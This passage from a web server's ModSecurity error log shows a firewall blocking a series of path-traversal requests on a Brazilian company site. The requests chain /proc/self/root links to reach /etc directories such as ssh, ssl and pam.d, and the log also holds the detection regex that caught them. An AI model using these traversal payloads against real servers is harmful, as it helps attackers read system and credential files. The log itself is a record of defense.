"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMkf9ocpUE4ed4uDzi_QAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:08.894155 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.243.203:57504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMrBXjF1vJNtV6CWrt_QAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:10.270924 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:32878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMrv9ocpUE4ed4uDzjGQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:13.890414 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:32894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMsXbQATo66fKoS7xDsAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:15.187894 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:32908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMs3bQATo66fKoS7xDsQAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:21.947185 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:32912] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMuY6lpbStxTqkSktjcAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:24.514222 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:44622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMvLABkC4fWIHEf8HhsAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:26.917117 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:44632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMvglT9VtDQc7bgUyjGgAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:28.310520 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:44648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMwAlT9VtDQc7bgUyjGwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:34.003099 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.241.46:39804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMxnbQATo66fKoS7xDuQAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:36.298041 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:44650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMyAlT9VtDQc7bgUyjIwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:37.611424 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.243.203:39696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgMyXbQATo66fKoS7xDugAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:44.750294 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:39710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM0BXjF1vJNtV6CWruBQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:51.142932 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:46340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM13jZBu2q05ozVU9LjwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:52.465921 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:52034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM2NSswJuvopo3lOhV7gAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:59:53.803366 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.243.203:52040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM2XbQATo66fKoS7xDvwAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:03.839707 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:52046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM446lpbStxTqkSktjfQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:05.209475 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:55126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM5bABkC4fWIHEf8HhzQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:06.487883 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:55136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM5pqj1wV0Si-Okefg5QAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:08.850694 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:55146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM6Jqj1wV0Si-Okefg5wAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:12.343330 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:55162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM7Jqj1wV0Si-Okefg6wAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:13.626679 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:56494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM7QlT9VtDQc7bgUyjJwAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
